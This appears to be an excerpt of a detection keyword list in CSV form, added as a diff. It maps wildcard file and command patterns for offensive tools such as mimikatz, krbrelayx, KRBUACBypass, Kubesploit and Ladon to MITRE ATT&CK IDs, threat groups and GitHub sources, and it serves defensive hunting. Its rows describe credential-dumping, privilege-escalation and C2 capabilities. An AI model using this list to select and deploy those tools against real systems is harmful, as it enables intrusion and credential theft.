+"*KrbRelay.sln*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*KrbRelayUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*krbrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","10","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*krbrelayx.git*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*krbrelayx.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*krbrelayx.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*krbrelayx-master*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*krbroast-pcap2hashcat.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for 
attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z"
+"*KRBUACBypass 1*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z"
+"*KRBUACBypass.csproj*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z"
+"*KRBUACBypass.exe*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z"
+"*KRBUACBypass.sln*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z"
+"*ktsuss-lpe.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*kubeletAttack.json*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - 
T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*Kubesploit Agent*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*kubesploitAgent-Darwin*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*kubesploitAgent-Linux*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*kubesploit-main*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*kubesploitServer-Darwin*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - 
T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*kubesploitServer-Linux*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*kuhl_m_sekurlsa_nt6.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kuhl_m_sekurlsa_nt6.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kuhl_m_sekurlsa_packages.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kuhl_m_sekurlsa_packages.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kuhl_m_sekurlsa_utils.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kuhl_m_sekurlsa_utils.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*kwallet2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*kwetza*","offensive_tool_keyword","kwetza","Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.","T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002","TA0001 - TA0004 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/sensepost/kwetza","1","0","N/A","N/A","7","604","256","2023-07-21T16:30:40Z","2016-09-22T14:39:10Z"
+"*kyleavery/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z"
+"*kyleavery/inject-assembly*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z"
+"*L0phtCrack*","offensive_tool_keyword","L0phtCrack","L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper 
access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. visit the L0phtCrack homepage.","T1003 - T1110 - T1212 - T1552 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://www.l0phtcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*label-implant *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Ladon * AllScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon * CiscoScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon * OnlineIP*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon * OnlinePC*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon * OsScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon * OxidScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *.txt *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *DeBase64*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon *FtpScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
